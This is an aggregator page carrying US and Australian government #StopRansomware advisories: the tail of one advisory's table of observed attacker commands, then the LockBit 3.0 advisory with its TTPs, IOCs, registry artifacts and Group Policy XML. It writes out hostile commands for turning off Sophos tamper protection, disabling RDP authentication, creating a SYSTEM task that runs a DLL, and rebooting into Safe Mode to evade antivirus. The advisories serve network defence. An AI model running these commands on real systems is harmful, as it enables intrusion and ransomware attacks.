</td>
</tr><tr><td>
<p>mstsc</p>
</td>
<td>
<p>Launches Microsoft Remote Desktop Connection client application in Windows.</p>
</td>
</tr><tr><td>
<p>net group /domain</p>
</td>
<td>
<p>Retrieves a list of all groups from the domain controller.</p>
</td>
</tr><tr><td>
<p>net group 'Domain Admins' /domain</p>
</td>
<td>
<p>Queries the domain controller to retrieve a list of all accounts from <a>Domain Admins</a> group.</p>
</td>
</tr><tr><td>
<p>net group 'Domain Computers' /domain</p>
</td>
<td>
<p>Queries the domain controller to retrieve a list of all accounts from <a>Domain Computers</a> group.</p>
</td>
</tr><tr><td>
<p>net user /domain</p>
</td>
<td>
<p>Queries the domain controller to retrieve a list of all users in the domain.</p>
</td>
</tr><tr><td>
<p>net.exe localgroup "Remote Desktop Users" <user> /add</user></p>
</td>
<td>
<p>Adds a user account to the local <a>Remote Desktop Users</a> group.</p>
</td>
</tr><tr><td>
<p>net.exe user <admin><password> /domain</password></admin></p>
</td>
<td>
<p>Modifies the password for the specified account.</p>
</td>
</tr><tr><td>
<p>netsh.exe advfirewall firewall add rule "name=allow RemoteDesktop" dir=in * protocol=TCP localport=<port num> action=allow</port></p>
</td>
<td>
<p>Adds a new rule to the Windows firewall that allows incoming RDP traffic.</p>
</td>
</tr><tr><td>
<p>netsh.exe advfirewall firewall set rule "group=remote desktop" new enable=Yes</p>
</td>
<td>
<p>Enables the pre-existing Windows firewall rule group named <a>Remote Desktop</a>. This rule group allows incoming RDP traffic.</p>
</td>
</tr><tr><td>
<p>nltest /dclist</p>
</td>
<td>
<p>Retrieves a list of domain controllers.</p>
</td>
</tr><tr><td>
<p>nltest /domain_trusts</p>
</td>
<td>
<p>Retrieves a list of domain trusts.</p>
</td>
</tr><tr><td>
<p>ping.exe -4 -n 1 *</p>
</td>
<td>
<p>Sends a single ICMP echo request packet to all devices on the local network using the IPv4 protocol. The output of the command will show if the device is reachable or not.</p>
</td>
</tr><tr><td>
<p>quser; ([adsisearcher]"(ObjectClass=computer)").FindAll().count;([adsisearcher]"(ObjectClass=user)").FindAll().count;[Security.Principal.WindowsIdentity]::GetCurrent() | select name;net user "$env:USERNAME" /domain; (Get-WmiObject -class Win32_OperatingSystem).Caption; Get-WmiObject -Namespace root\cimv2 -Class Win32_ComputerSystem; net group "domain admins" /domain; nltest /dclist:; nltest /DOMAIN_TRUSTS</p>
</td>
<td>
<p>Lists the current Windows identity for the logged-in user and displays the user's name. Uses the Active Directory Services Interface (ADSI) to search for all computer and user objects in the domain and returns counts of the quantities found. Lists information about the current user account from the domain, such as the user's name, description, and group memberships. Lists information about the operating system installed on the local computer. Lists information about the "Domain Admins" group from the domain. Lists all domain controllers in the domain. Displays information about domain trusts.</p>
</td>
</tr><tr><td>
<p>reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal * Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f</p>
</td>
<td>
<p>Adds/overwrites a new Registry value to disable user authentication for RDP connections.</p>
</td>
</tr><tr><td>
<p>reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /* v fAllowToGetHelp /t REG_DWORD /d 1 /f</p>
</td>
<td>
<p>Adds/overwrites a new Registry value to allow a user to receive help from Remote Assistance.</p>
</td>
</tr><tr><td>
<p>reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos Endpoint * Defense\TamperProtection\Config" /t REG_DWORD /v SAVEnabled /d 0 /f</p>
</td>
<td>
<p>Adds/overwrites a new Registry value to disable tamper protection for Sophos antivirus named SAVEnabled.</p>
</td>
</tr><tr><td>
<p>reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos Endpoint * Defense\TamperProtection\Config" /t REG_DWORD /v SEDEnabled /d 0 /f</p>
</td>
<td>
<p>Adds/overwrites a new Registry value to disable tamper protection for Sophos antivirus named SEDEnabled.</p>
</td>
</tr><tr><td>
<p>reg.exe ADD * HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Sophos\SAVService\TamperProtection /t REG_DWORD /v Enabled /d 0 /f</p>
</td>
<td>
<p>Adds/overwrites a new registry value to disable tamper protection for a Sophos antivirus service called SAVService.</p>
</td>
</tr><tr><td>
<p>reg.exe copy hklm\system\CurrentControlSet\services\tvnserver * hklm\system\CurrentControlSet\control\safeboot\network\tvnserver /s /f</p>
</td>
<td>
<p>Copies the configuration settings for the <a>tvnserver</a> service to a new location in the registry that will be used when the computer boots into Safe Mode with Networking. This allows the service to run with the same settings in Safe Mode as it does in normal mode.</p>
</td>
</tr><tr><td>
<p>s.exe /threads:50 /ldap:all /verbose /outfile:c:\users\<user>\desktop\1.txt</user></p>
</td>
<td>
<p>Executes SharpShares.</p>
</td>
</tr><tr><td>
<p>schtasks.exe /RU SYSTEM /create /sc ONCE /<user> /tr "cmd.exe /crundll32.exe c:\programdata\netsh.dll,Entry" /ST 04:43</user></p>
</td>
<td>
<p>Creates a Scheduled Task run as <a>SYSTEM</a> at 0443 AM. When the task is run, <a>cmd.exe</a> uses <a>crundll32.exe</a> to run the DLL file <a>netsh.dll</a>. (It is likely that netsh.dll is a malware file and not associated with <a>netsh</a>.)</p>
</td>
</tr><tr><td>
<p>start-process PowerShell.exe -arg C:\Users\Public\Music\<file>.ps1 -WindowStyle Hidden</file></p>
</td>
<td>
<p>Executes a PowerShell script, while keeping the PowerShell window hidden from the user.</p>
</td>
</tr></tbody></table><h3>Disclaimer</h3>
<p>The information in this report is being provided “as is” for informational purposes only. FBI, CISA, and ACSC do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, or ACSC.</p>
<p> </p>]]></content:encoded>
</item>
<item>
<title><![CDATA[#StopRansomware: LockBit 3.0]]></title>
<description><![CDATA[SUMMARY
Note: this joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniq...]]></description>
<link>https://tsecurity.de/de/1825191/sicherheitsluecken/stopransomware-lockbit-30/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1825191/sicherheitsluecken/stopransomware-lockbit-30/</guid>
<pubDate>Fri, 17 Mar 2023 03:18:20 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4><strong>SUMMARY</strong></h4>
<p><em>Note: this joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.</em></p>
<p><strong>Actions to take today to mitigate cyber threats from ransomware:</strong></p>
<ul><li>Prioritize remediating <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog">known exploited vulnerabilities</a>.</li>
<li>Train users to recognize and report <a href="https://www.cisa.gov/phishing-infographic">phishing attempts</a>.</li>
<li>Enable and enforce phishing- resistant <a href="https://www.cisa.gov/mfa">multifactor authentication</a>.</li>
</ul><p>The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing &amp; Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate known LockBit 3.0 ransomware IOCs and TTPs identified through FBI investigations as recently as March 2023.</p>
<p>The LockBit 3.0 ransomware operations function as a Ransomware-as-a-Service (RaaS) model and is a continuation of previous versions of the ransomware, LockBit 2.0, and LockBit. Since January 2020, LockBit has functioned as an affiliate-based ransomware variant; affiliates deploying the LockBit RaaS use many varying TTPs and attack a wide range of businesses and critical infrastructure organizations, which can make effective computer network defense and mitigation challenging.</p>
<p>The FBI, CISA, and the MS-ISAC encourage organizations to implement the recommendations in the mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.</p>
<p>Download the PDF version of this report: </p>



<div class="align-center c-file">
    <div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2023-03/aa23-075a-stop-ransomware-lockbit.pdf" class="c-file__link" target="_blank">#StopRansomware: Lockbit</a>
    <span class="c-file__size">(PDF,       688.70 KB
  )</span>
  </div>
</div>
<h4><strong>TECHNICAL DETAILS</strong></h4>
<p><em>Note: This advisory uses the MITRE ATT&amp;CK® for Enterprise framework, version 12. See the MITRE ATT&amp;CK Tactics and Techniques section for a table of the threat actors’ activity mapped to <a href="https://attack.mitre.org/versions/v12/matrices/enterprise/">MITRE ATT&amp;CK for Enterprise</a>.</em></p>
<h5>CAPABILITIES</h5>
<p>LockBit 3.0, also known as “LockBit Black,” is more modular and evasive than its previous versions and shares similarities with Blackmatter and Blackcat ransomware.</p>
<p>LockBit 3.0 is configured upon compilation with many different options that determine the behavior of the ransomware. Upon the actual execution of the ransomware within a victim environment, various arguments can be supplied to further modify the behavior of the ransomware. For example, LockBit 3.0 accepts additional arguments for specific operations in lateral movement and rebooting into Safe Mode (see LockBit Command Line parameters under Indicators of Compromise). If a LockBit affiliate does not have access to passwordless LockBit 3.0 ransomware, then a password argument is mandatory during the execution of the ransomware. LockBit 3.0 affiliates failing to enter the correct password will be unable to execute the ransomware [<a href="https://attack.mitre.org/versions/v12/techniques/T1480/001/">T1480.001</a>]. The password is a cryptographic key which decodes the LockBit 3.0 executable. By protecting the code in such a manner, LockBit 3.0 hinders malware detection and analysis with the code being unexecutable and unreadable in its encrypted form. Signature-based detections may fail to detect the LockBit 3.0 executable as the executable’s encrypted potion will vary based on the cryptographic key used for encryption while also generating a unique hash. When provided the correct password, LockBit 3.0 will decrypt the main component, continue to decrypt or decompress its code, and execute the ransomware.</p>
<p>LockBit 3.0 will only infect machines that do not have language settings matching a defined exclusion list. However, whether a system language is checked at runtime is determined by a configuration flag originally set at compilation time. Languages on the exclusion list include, but are not limited to, Romanian (Moldova), Arabic (Syria), and Tatar (Russia). If a language from the exclusion list is detected [<a href="https://attack.mitre.org/versions/v12/techniques/T1614/001/">T1614.001</a>], LockBit 3.0 will stop execution without infecting the system.</p>
<h5>INITIAL ACCESS</h5>
<p>Affiliates deploying LockBit 3.0 ransomware gain initial access to victim networks via remote desktop protocol (RDP) exploitation [<a href="https://attack.mitre.org/versions/v12/techniques/T1133/">T1133</a>], drive-by compromise [<a href="https://attack.mitre.org/versions/v12/techniques/T1189/">T1189</a>], phishing campaigns [<a href="https://attack.mitre.org/versions/v12/techniques/T1566/">T1566</a>], abuse of valid accounts [<a href="https://attack.mitre.org/versions/v12/techniques/T1078/">T1078</a>], and exploitation of public-facing applications [<a href="https://attack.mitre.org/versions/v12/techniques/T1190/">T1190</a>].</p>
<h5>EXECUTION AND INFECTION PROCESS</h5>
<p>During the malware routine, if privileges are not sufficient, LockBit 3.0 attempts to escalate to the required privileges [<a href="https://attack.mitre.org/versions/v12/tactics/TA0004/">TA0004</a>]. LockBit 3.0 performs functions such as:</p>
<ul><li>Enumerating system information such as hostname, host configuration, domain information, local drive configuration, remote shares, and mounted external storage devices [<a href="https://attack.mitre.org/versions/v12/techniques/T1082/">T1082</a>]</li>
<li>Terminating processes and services [<a href="https://attack.mitre.org/versions/v12/techniques/T1489/">T1489</a>]</li>
<li>Launching commands [<a href="https://attack.mitre.org/versions/v12/tactics/TA0002/">TA0002</a>]</li>
<li>Enabling automatic logon for persistence and privilege escalation [<a href="https://attack.mitre.org/versions/v12/techniques/T1547/">T1547</a>]</li>
<li>Deleting log files, files in the recycle bin folder, and shadow copies residing on disk [<a href="https://attack.mitre.org/versions/v12/techniques/T1485/">T1485</a>], [<a href="https://attack.mitre.org/versions/v12/techniques/T1490/">T1490</a>]</li>
</ul><p>LockBit 3.0 attempts to spread across a victim network by using a preconfigured list of credentials hardcoded at compilation time or a compromised local account with elevated privileges [<a href="https://attack.mitre.org/versions/v12/techniques/T1078/002/">T1078</a>]. When compiled, LockBit 3.0 may also enable options for spreading via Group Policy Objects and PsExec using the Server Message Block (SMB) protocol. LockBit 3.0 attempts to encrypt [<a href="https://attack.mitre.org/versions/v12/techniques/T1486/">T1486</a>] data saved to any local or remote device, but skips files associated with core system functions.</p>
<p>After files are encrypted, LockBit 3.0 drops a ransom note with the new filename <strong><ransomware>.README.txt</ransomware></strong> and changes the host’s wallpaper and icons to LockBit 3.0 branding [<a href="https://attack.mitre.org/versions/v12/techniques/T1491/001/">T1491.001</a>]. If needed, LockBit 3.0 will send encrypted host and bot information to a command and control (C2) server [<a href="https://attack.mitre.org/versions/v12/techniques/T1027/">T1027</a>].</p>
<p>Once completed, LockBit 3.0 may delete itself from the disk [<a href="https://attack.mitre.org/versions/v12/techniques/T1070/004/">T1070.004</a>] as well as any Group Policy updates that were made, depending on which options were set at compilation time.</p>
<h5>EXFILTRATION</h5>
<p>LockBit 3.0 affiliates use Stealbit, a custom exfiltration tool used previously with LockBit 2.0 [<a href="https://attack.mitre.org/versions/v12/tactics/TA0010/">TA0010</a>]; rclone, an open-source command line cloud storage manager [<a href="https://attack.mitre.org/versions/v12/techniques/T1567/002/">T1567.002</a>]; and publicly available file sharing services, such as MEGA [<a href="https://attack.mitre.org/versions/v12/techniques/T1567/002/">T1567.002</a>], to exfiltrate sensitive company data files prior to encryption. While rclone and many publicly available file sharing services are primarily used for legitimate purposes, they can also be used by threat actors to aid in system compromise, network exploration, or data exfiltration. LockBit 3.0 affiliates often use other publicly available file sharing services to exfiltrate data as well [<a href="https://attack.mitre.org/versions/v12/techniques/T1567/002/">T1567</a>] (see Table 1).</p>
<table><caption><strong><em>Table 1: Anonymous File Sharing Sites Used to Exfiltrate Data Before System Encryption</em></strong></caption>
<thead><tr><th scope="col"><strong><u>File Sharing Site</u></strong></th>
</tr></thead><tbody><tr><td>https://www.premiumize[.]com</td>
</tr><tr><td>https://anonfiles[.]com</td>
</tr><tr><td>https://www.sendspace[.]com</td>
</tr><tr><td>https://fex[.]net</td>
</tr><tr><td>https://transfer[.]sh</td>
</tr><tr><td>https://send.exploit[.]in</td>
</tr></tbody></table><h5>LEVERAGING FREEWARE AND OPEN-SOURCE TOOLS</h5>
<p>LockBit affiliates have been observed using various freeware and open-source tools during their intrusions. These tools are used for a range of activities such as network reconnaissance, remote access and tunneling, credential dumping, and file exfiltration. Use of PowerShell and Batch scripts<br>
are observed across most intrusions, which focus on system discovery, reconnaissance, password/credential hunting, and privilege escalation. Artifacts of professional penetration-testing tools such as Metasploit and Cobalt Strike have also been observed. See Table 2 for a list of legitimate freeware and open-source tools LockBit affiliates have repurposed for ransomware operations:</p>
<table><caption><em>Table 2: Freeware and Open-Source Tools Used by LockBit 3.0 Affiliates</em></caption>
<thead><tr><th scope="col"><strong>Tool</strong></th>
<th scope="col"><strong>Description</strong></th>
<th scope="col"><strong>MITRE ATT&amp;CK ID</strong></th>
</tr></thead><tbody><tr><td>Chocolatey</td>
<td>Command-line package manager for Windows.</td>
<td><a href="https://attack.mitre.org/versions/v12/techniques/T1072/">T1072</a></td>
</tr><tr><td>FileZilla</td>
<td>Cross-platform File Transfer Protocol (FTP) application.</td>
<td><a href="https://attack.mitre.org/versions/v12/techniques/T1071/002/">T1071.002</a></td>
</tr><tr><td>Impacket</td>
<td>Collection of Python classes for working with network protocols.</td>
<td><a href="https://attack.mitre.org/versions/v12/software/S0357/">S0357</a></td>
</tr><tr><td>MEGA Ltd MegaSync</td>
<td>Cloud-based synchronization tool.</td>
<td><a href="https://attack.mitre.org/versions/v12/techniques/T1567/002/">T1567.002</a></td>
</tr><tr><td>Microsoft Sysinternals ProcDump</td>
<td>Generates crash dumps. Commonly used to dump the contents of Local Security Authority Subsystem Service, LSASS.exe.</td>
<td><a href="https://attack.mitre.org/versions/v12/techniques/T1003/001/">T1003.001</a></td>
</tr><tr><td>Microsoft Sysinternals PsExec</td>
<td>Execute a command-line process on a remote machine.</td>
<td><a href="https://attack.mitre.org/versions/v12/software/S0029/">S0029</a></td>
</tr><tr><td>Mimikatz</td>
<td>Extracts credentials from system.</td>
<td><a href="https://attack.mitre.org/versions/v12/software/S0002/">S0002</a></td>
</tr><tr><td>Ngrok</td>
<td>Legitimate remote-access tool abused to bypass victim network protections.</td>
<td><a href="https://attack.mitre.org/versions/v12/software/S0508/">S0508</a></td>
</tr><tr><td>PuTTY Link (Plink)</td>
<td>Can be used to automate Secure Shell (SSH) actions on Windows.</td>
<td><a href="https://attack.mitre.org/versions/v12/techniques/T1572/">T1572</a></td>
</tr><tr><td>Rclone</td>
<td>Command-line program to manage cloud storage files</td>
<td><a href="https://attack.mitre.org/versions/v12/software/S1040/">S1040</a></td>
</tr><tr><td>SoftPerfect Network Scanner</td>
<td>Performs network scans.</td>
<td><a href="https://attack.mitre.org/versions/v12/techniques/T1046/">T1046</a></td>
</tr><tr><td>Splashtop</td>
<td>Remote-desktop software.</td>
<td><a href="https://attack.mitre.org/versions/v12/techniques/T1021/001/">T1021.001</a></td>
</tr><tr><td>WinSCP</td>
<td>SSH File Transfer Protocol client for Windows.</td>
<td><a href="https://attack.mitre.org/versions/v12/techniques/T1048/">T1048</a></td>
</tr></tbody></table><h6>Indicators of Compromise (IOCs)</h6>
<p>The IOCs and malware characteristics outlined below were derived from field analysis. The following samples are current as of March 2023.</p>
<p><em><strong>LockBit 3.0 Black Icon</strong></em></p>
  
  
  
  
<figure class="c-figure c-figure--large c-figure--image  u-align-left" role="group"><div class="c-figure__media">  <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2023-03/picture1_0.jpg?itok=B28eB1c9" width="50" height="38" alt="LockBit 3.0 black icon." typeof="foaf:Image"></div>
  </figure><p> </p>
<p> </p>
<p><em><strong>LockBit 3.0 Wallpaper</strong></em></p>
  
  
  
  
<figure class="c-figure c-figure--large c-figure--image  u-align-left" role="group"><div class="c-figure__media">  <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2023-03/picture2.jpg?itok=eYzrYF9B" width="643" height="175" alt="Rectangular wallpaper reading " lockbit black: all your important files are stolen and encrypted you must find file follow the instruction typeof="foaf:Image"></div>
  </figure><p> </p>
<p> </p>
<p> </p>
<p><em><strong>LockBit Command Line Parameters</strong></em></p>
<table><thead><tr><th scope="col"><strong>LockBit Parameters</strong></th>
<th scope="col"><strong>Description</strong></th>
</tr></thead><tbody><tr><td>
<pre>
-del</pre></td>
<td>Self-delete.</td>
</tr><tr><td>
<pre>
-gdel</pre></td>
<td>Remove LockBit 3.0 group policy changes.</td>
</tr><tr><td>
<pre>
-gspd</pre></td>
<td>Spread laterally via group policy.</td>
</tr><tr><td>
<pre>
-pass (32 character value)</pre></td>
<td>(Required) Password used to launch LockBit 3.0.</td>
</tr><tr><td>
<pre>
-path (File or path)</pre></td>
<td>Only encrypts provided file or folder.</td>
</tr><tr><td>
<pre>
-psex</pre></td>
<td>Spread laterally via admin shares.</td>
</tr><tr><td>
<pre>
-safe</pre></td>
<td>Reboot host into Safe Mode.</td>
</tr><tr><td>
<pre>
-wall</pre></td>
<td>Sets LockBit 3.0 Wallpaper and prints out LockBit 3.0 ransom note.</td>
</tr></tbody></table><h6>Mutual Exclusion Object (Mutex) Created</h6>
<p>When executed, LockBit 3.0 will create the mutex, Global\<md4 hash of machine guid>,<br>
and check to see if this mutex has already been created to avoid running more than one instance of the ransomware.</md4></p>
<h6>UAC Bypass via Elevated COM Interface</h6>
<p>LockBit 3.0 is capable of bypassing User Account Control (UAC) to execute code with elevated privileges via elevated Component Object Model (COM) Interface. <strong>C:\Windows\System32\dllhost.exe</strong> is spawned with high integrity with the command line GUID <strong>3E5FC7F9-9A51-4367-9063-A120244FBEC</strong>.</p>
<p>For example, <strong>%SYSTEM32%\dllhost.exe/Processid:{3E5FC7F9-9A51-4367-9063- A120244FBEC7}</strong>.</p>
<h6>Volume Shadow Copy Deletion</h6>
<p>LockBit 3.0 uses Windows Management Instrumentation (WMI) to identify and delete Volume Shadow Copies. LockBit 3.0 uses <strong>select * from Win32_ShadowCopy</strong> to query for Volume Shadow copies, <strong>Win32_ShadowCopy.ID</strong> to obtain the ID of the shadow copy, and <strong>DeleteInstance</strong> to delete any shadow copies.</p>
<h6>Registry Artifacts</h6>
<p><em><strong>LockBit 3.0 Icon</strong></em></p>
<table><thead><tr><th scope="col">Registry Key</th>
<th scope="col">Value</th>
<th scope="col">Data</th>
</tr></thead><tbody><tr><td>
<pre>
HKCR\. <malware extension></malware></pre></td>
<td>
<pre>
(Default)</pre></td>
<td>
<pre>
<malware extension></malware></pre></td>
</tr><tr><td>
<pre>
HKCR\<malware extension>\DefaultIcon</malware></pre></td>
<td>
<pre>
(Default)</pre></td>
<td>
<pre>
C:\ProgramData\<mal ware extension>.ico</mal></pre></td>
</tr></tbody></table><p><strong><em>LockBit 3.0 Wallpaper</em></strong></p>
<table><thead><tr><th scope="col">Registry Key</th>
<th scope="col">Value</th>
<th scope="col">Data</th>
</tr></thead><tbody><tr><td>
<pre>
HKCU\Control Panel\Desktop\WallPaper</pre></td>
<td>
<pre>
(Default)</pre></td>
<td>
<pre>
C:\ProgramData\<mal ware extension>.bmp</mal></pre></td>
</tr></tbody></table><p><strong><em>Disable Privacy Settings Experience</em></strong></p>
<table><thead><tr><th scope="col">Registry Key</th>
<th scope="col">Value</th>
<th scope="col">Data</th>
</tr></thead><tbody><tr><td>
<pre>
SOFTWARE\Policies\Microsoft\Win
dows\OOBE</pre></td>
<td>
<pre>
DisablePrivacyE
xperience</pre></td>
<td>0</td>
</tr></tbody></table><p><strong><em>Enable Automatic Logon</em></strong></p>
<table><thead><tr><th scope="col">Registry Key</th>
<th scope="col">Value</th>
<th scope="col">Data</th>
</tr></thead><tbody><tr><td>
<pre>
SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon</pre></td>
<td>
<pre>
AutoAdminLogon</pre></td>
<td>
<pre>
1</pre></td>
</tr><tr><td>
<pre>
 </pre></td>
<td>
<pre>
DefaultUserName</pre></td>
<td>
<pre>
<username></username></pre></td>
</tr><tr><td>
<pre>
 </pre></td>
<td>
<pre>
DefaultDomainNa
me</pre></td>
<td>
<pre>
<domain name></domain></pre></td>
</tr><tr><td>
<pre>
 </pre></td>
<td>
<pre>
DefaultPassword</pre></td>
<td>
<pre>
<password></password></pre></td>
</tr></tbody></table><p><strong><em>Disable and Clear Windows Event Logs</em></strong></p>
<table><thead><tr><th scope="col">Registry Key</th>
<th scope="col">Value</th>
<th scope="col">Data</th>
</tr></thead><tbody><tr><td>
<pre>
HKLM\SOFTWARE\Microsoft\Windows
\CurrentVersion\WINEVT\Channels
\*</pre></td>
<td>
<pre>
Enabled</pre></td>
<td>
<pre>
0</pre></td>
</tr><tr><td>
<pre>
HKLM\SOFTWARE\Microsoft\Windows
\CurrentVersion\WINEVT\Channels
\* \ChannelAccess</pre></td>
<td>
<pre>
ChannelAccess</pre></td>
<td>
<pre>
AO:BAG:SYD:(A;;0x1;;
;SY)(A;;0x5;;;BA)(A;
;0x1;;;LA)</pre></td>
</tr></tbody></table><h6>Ransom Locations</h6>
<table><thead><tr><th scope="col">LockBit 3.0 File Path Locations</th>
</tr></thead><tbody><tr><td>
<pre>
ADMIN$\Temp\<lockbit3.0 filename>.exe</lockbit3.0></pre></td>
</tr><tr><td>
<pre>
%SystemRoot%\Temp\<lockbit3.0 filename>.exe</lockbit3.0></pre></td>
</tr><tr><td>
<pre>
\<domain name>\sysvol\<domain name>\scripts\<lockbit filename>.exe (Domain Controller)</lockbit></domain></domain></pre></td>
</tr></tbody></table><h6>Safe Mode Launch Commands</h6>
<p>LockBit 3.0 has a Safe Mode feature to circumvent endpoint antivirus and detection. Depending upon the host operating system, the following command is launched to reboot the system to Safe Mode with Networking:</p>
<table><thead><tr><th scope="col">Operating System</th>
<th scope="col">Safe Mode with Networking command</th>
</tr></thead><tbody><tr><td>Vista and newer</td>
<td>
<pre>
bcdedit /set {current} safeboot network</pre></td>
</tr><tr><td>Pre-Vista</td>
<td>
<pre>
bootcfg /raw /a /safeboot:network /id 1</pre></td>
</tr></tbody></table><table><thead><tr><th scope="col">Operating System</th>
<th scope="col">Disable Safe mode reboot</th>
</tr></thead><tbody><tr><td>Vista and newer</td>
<td>
<pre>
bcdedit /deletevalue {current} safeboot</pre></td>
</tr><tr><td>Pre-Vista</td>
<td>
<pre>
bootcfg /raw /fastdetect /id 1</pre></td>
</tr></tbody></table><h6>Group Policy Artifacts</h6>
<p>The following are Group Policy Extensible Markup Language (XML) files identified after a LockBit 3.0 infection:</p>
<table><thead><tr><th scope="col">NetworkShares.xml</th>
</tr></thead><tbody><tr><td><?xml version="1.0" encoding="utf-8"?><br><networksharesettings clsid="{520870D8-A6E7-47e8-A8D8-E6A4E76EAEC2}"><br><netshare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}"></netshare>
			image="2" name="%%ComputerName%%_D" changed="%s" uid="%s"&gt;<br><properties action="U" name="%%ComputerName%%_D" path="D:" comment="" allregular="0" allhidden="0" alladmindrive="0" limitusers="NO_CHANGE" abe="NO_CHANGE"></properties></networksharesettings></td>
</tr></tbody></table><p><strong>Services.xml</strong> stops and disables services on the Active Directory (AD) hosts.</p>
<table><thead><tr><th scope="col">Services.xml</th>
</tr></thead><tbody><tr><td><?xml version="1.0" encoding="utf-8"?><br><ntservices clsid="{2CFB484A-4E96-4b5d-A0B6-093D2F91E6AE}"><br><ntservice clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"></ntservice>
			name="SQLPBDMS" image="4" changed="%s" uid="%s" disabled="0"&gt;<br><properties startuptype="DISABLED" servicename="SQLPBDMS" serviceaction="STOP" timeout="30"></properties><br><br><ntservice clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"></ntservice>
			name="SQLPBENGINE" image="4" changed="%s" uid="%s" disabled="0"&gt;<br><properties startuptype="DISABLED" servicename="SQLPBENGINE" serviceaction="STOP" timeout="30"></properties><br><br><ntservice clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"></ntservice>
			name="MSSQLFDLauncher" image="4" changed="%s" uid="%s" userContext="0" removePolicy="0" disabled="0"&gt;<br><properties startuptype="DISABLED" servicename="MSSQLFDLauncher" serviceaction="STOP" timeout="30"></properties><br><br><ntservice clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"></ntservice>
			name="SQLSERVERAGENT" image="4" changed="%s" uid="%s" disabled="0"&gt;<br><properties startuptype="DISABLED" servicename="SQLSERVERAGENT" serviceaction="STOP" timeout="30"></properties><br><br><ntservice clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"></ntservice>
			name="MSSQLServerOLAPService" image="4" changed="%s" uid="%s" disabled="0"&gt;<br><properties startuptype="DISABLED" servicename="MSSQLServerOLAPService" serviceaction="STOP" timeout="30"></properties><br><br><ntservice clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"></ntservice>
			name="SSASTELEMETRY" image="4" changed="%s" uid="%s" disabled="0"&gt;<br><properties startuptype="DISABLED" servicename="SSASTELEMETRY" serviceaction="STOP" timeout="30"></properties><br><br><ntservice clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"></ntservice>
			name="SQLBrowser" image="4" changed="%s" uid="%s" disabled="0"&gt;<br><properties startuptype="DISABLED" servicename="SQLBrowser" serviceaction="STOP" timeout="30"></properties><br><br><ntservice clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"></ntservice>
			name="SQL Server Distributed Replay Client" image="4" changed="%s" uid="%s" disabled="0"&gt;<br><properties startuptype="DISABLED" servicename="SQL Server Distributed Replay Client" serviceaction="STOP" timeout="30"></properties><br><br><ntservice clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"></ntservice>
			name="SQL Server Distributed Replay Controller" image="4" changed="%s" uid="%s" disabled="0"&gt;<br><properties startuptype="DISABLED" servicename="SQL Server Distributed Replay Controller" serviceaction="STOP" timeout="30"></properties><br><br><ntservice clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"></ntservice>
			name="MsDtsServer150" image="4" changed="%s" uid="%s" disabled="0"&gt;<br><properties startuptype="DISABLED" servicename="MsDtsServer150" serviceaction="STOP" timeout="30"></properties><br><br><ntservice clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"></ntservice>
			name="SSISTELEMETRY150" image="4" changed="%s" uid="%s" disabled="0"&gt;<br><properties startuptype="DISABLED" servicename="SSISTELEMETRY150" serviceaction="STOP" timeout="30"></properties><br><br><ntservice clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"></ntservice>
			name="SSISScaleOutMaster150" image="4" changed="%s" uid="%s" disabled="0"&gt;<br><properties startuptype="DISABLED" servicename="SSISScaleOutMaster150" serviceaction="STOP" timeout="30"></properties><br><br><ntservice clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"></ntservice>
			name="SSISScaleOutWorker150" image="4" changed="%s" uid="%s" disabled="0"&gt;<br><properties startuptype="DISABLED" servicename="SSISScaleOutWorker150" serviceaction="STOP" timeout="30"></properties><br><br><ntservice clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"></ntservice>
			name="MSSQLLaunchpad" image="4" changed="%s" uid="%s" disabled="0"&gt;<br><properties startuptype="DISABLED" servicename="MSSQLLaunchpad" serviceaction="STOP" timeout="30"></properties><br><br><ntservice clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"></ntservice>
